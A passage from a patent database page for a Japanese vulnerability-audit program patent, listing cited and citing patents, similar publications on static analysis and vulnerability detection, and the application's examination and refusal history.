| US8914890B2 (en) * | 2011-01-31 | 2014-12-16 | International Business Machines Corporation | Determining the vulnerability of computer software applications to privilege-escalation attacks |
| US20150207811A1 (en) * | 2012-07-31 | 2015-07-23 | Hewlett-Packard Development Company, L.P. | Vulnerability vector information analysis |
| US20150213272A1 (en) * | 2012-07-31 | 2015-07-30 | Hewlett-Packard Developement Company, L.P. | Conjoint vulnerability identifiers |
| CN104508672B (zh) * | 2012-08-01 | 2017-05-17 | 三菱电机株式会社 | 程序执行装置以及程序分析装置 |
| US10169032B2 (en) * | 2014-10-16 | 2019-01-01 | International Business Machines Corporation | Parallel development of diverged source streams |
| US11895138B1 (en) * | 2015-02-02 | 2024-02-06 | F5, Inc. | Methods for improving web scanner accuracy and devices thereof |
| US10691808B2 (en) * | 2015-12-10 | 2020-06-23 | Sap Se | Vulnerability analysis of software components |
| CN106940772B (zh) * | 2016-01-05 | 2020-09-18 | 阿里巴巴集团控股有限公司 | 变量对象的跟踪方法及装置 |
| JP7068752B2 (ja) * | 2018-03-22 | 2022-05-17 | 三菱電機株式会社 | ソースコード解析装置およびソースコード解析プログラム |
| US11042634B2 (en) * | 2018-12-21 | 2021-06-22 | Fujitsu Limited | Determining information leakage of computer-readable programs |
| CN110399725A (zh) * | 2019-06-18 | 2019-11-01 | 深圳壹账通智能科技有限公司 | 漏洞处理方法及装置、电子设备和计算机可读存储介质 |
| JP7008879B2 (ja) * | 2019-06-26 | 2022-01-25 | 三菱電機株式会社 | 情報処理装置、情報処理方法及び情報処理プログラム |
| JP2021086399A (ja) * | 2019-11-28 | 2021-06-03 | 富士通株式会社 | プログラムエラー統合プログラム及び情報処理装置 |
| EP3933632B1 (en) | 2020-07-02 | 2023-08-16 | Mitsubishi Electric R&D Centre Europe B.V. | Verifying a correct implementation of a confidentiality and integrity policy by a software |
| CN113010899B (zh) * | 2021-04-16 | 2022-06-07 | 上海交通大学 | 一种php反序列化漏洞利用链检测方法 |
Citations (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2004095176A2 (en) * | 2003-04-18 | 2004-11-04 | Ounce Labs, Inc. | Detecting vulnerabilities in source code |
Family Cites Families (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US6978441B2 (en) * | 2001-10-03 | 2005-12-20 | Sun Microsystems, Inc. | Rating apparatus and method for evaluating bugs |
| US7392545B1 (en) * | 2002-01-18 | 2008-06-24 | Cigital, Inc. | Systems and methods for detecting software security vulnerabilities |
| WO2005029241A2 (en) * | 2003-09-15 | 2005-03-31 | Plum Thomas S | Automated safe secure techniques for eliminating |
| US7624304B2 (en) * | 2004-10-07 | 2009-11-24 | Microsoft Corporation | Defect detection for integers |
-
2005
- 2005-02-17 WO PCT/JP2005/002422 patent/WO2006087780A1/ja not_active Application Discontinuation
- 2005-02-17 JP JP2007503520A patent/JPWO2006087780A1/ja active Pending
-
2007
- 2007-08-02 US US11/832,779 patent/US20070271617A1/en not_active Abandoned
Patent Citations (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2004095176A2 (en) * | 2003-04-18 | 2004-11-04 | Ounce Labs, Inc. | Detecting vulnerabilities in source code |
Also Published As
| Publication number | Publication date |
|---|---|
| WO2006087780A1 (ja) | 2006-08-24 |
| US20070271617A1 (en) | 2007-11-22 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| JPWO2006087780A1 (ja) | 脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法 | |
| US9715593B2 (en) | Software vulnerabilities detection system and methods | |
| Yang et al. | Appspear: Bytecode decrypting and dex reassembling for packed android malware | |
| Wassermann et al. | Sound and precise analysis of web applications for injection vulnerabilities | |
| Carmony et al. | Extract Me If You Can: Abusing PDF Parsers in Malware Detectors. | |
| US8635602B2 (en) | Verification of information-flow downgraders | |
| Yu et al. | Patching vulnerabilities with sanitization synthesis | |
| US8572747B2 (en) | Policy-driven detection and verification of methods such as sanitizers and validators | |
| US20120216177A1 (en) | Generating Sound and Minimal Security Reports Based on Static Analysis of a Program | |
| JP5863973B2 (ja) | プログラム実行装置及びプログラム解析装置 | |
| Backes et al. | R-droid: Leveraging android app analysis with static slice optimization | |
| US20130212682A1 (en) | Automatic discovery of system integrity exposures in system code | |
| US20170169228A1 (en) | Machine-checkable code-annotations for static application security testing | |
| JP5077455B2 (ja) | 脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法 | |
| US20210004470A1 (en) | Automatic Generation Of Patches For Security Violations | |
| US20170344746A1 (en) | Utilizing likely invariants for runtime protection of web services | |
| Kiss et al. | Combining static and dynamic analyses for vulnerability detection: illustration on heartbleed | |
| Homaei et al. | Athena: A framework to automatically generate security test oracle via extracting policies from source code and intended software behaviour | |
| US8875297B2 (en) | Interactive analysis of a security specification | |
| US10002253B2 (en) | Execution of test inputs with applications in computer security assessment | |
| Hoole et al. | Improving vulnerability detection measurement: [test suites and software security assurance] | |
| CN111027073B (zh) | 漏洞检测方法、装置、设备及存储介质 | |
| Hermann et al. | Getting to know you: Towards a capability model for java | |
| JP7008879B2 (ja) | 情報処理装置、情報処理方法及び情報処理プログラム | |
| KR20240066072A (ko) | 프로그램 정적 분석 방법 및 시스템 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| A131 | Notification of reasons for refusal |
Free format text: JAPANESE INTERMEDIATE CODE: A131 Effective date: 20100622 |
|
| A521 | Request for written amendment filed |
Free format text: JAPANESE INTERMEDIATE CODE: A523 Effective date: 20100820 |
|
| A131 | Notification of reasons for refusal |
Free format text: JAPANESE INTERMEDIATE CODE: A131 Effective date: 20100914 |
|
| A521 | Request for written amendment filed |
Free format text: JAPANESE INTERMEDIATE CODE: A523 Effective date: 20101112 |
|
| A02 | Decision of refusal |
Free format text: JAPANESE INTERMEDIATE CODE: A02 Effective date: 20101207 |
|
| A521 | Request for written amendment filed |
Free format text: JAPANESE INTERMEDIATE CODE: A523 Effective date: 20110307 |
|
| A911 | Transfer to examiner for re-examination before appeal (zenchi) |
Free format text: JAPANESE INTERMEDIATE CODE: A911 Effective date: 20110310 |
|
| A912 | Re-examination (zenchi) completed and case transferred to appeal board |
Free format text: JAPANESE INTERMEDIATE CODE: A912 Effective date: 20110401 |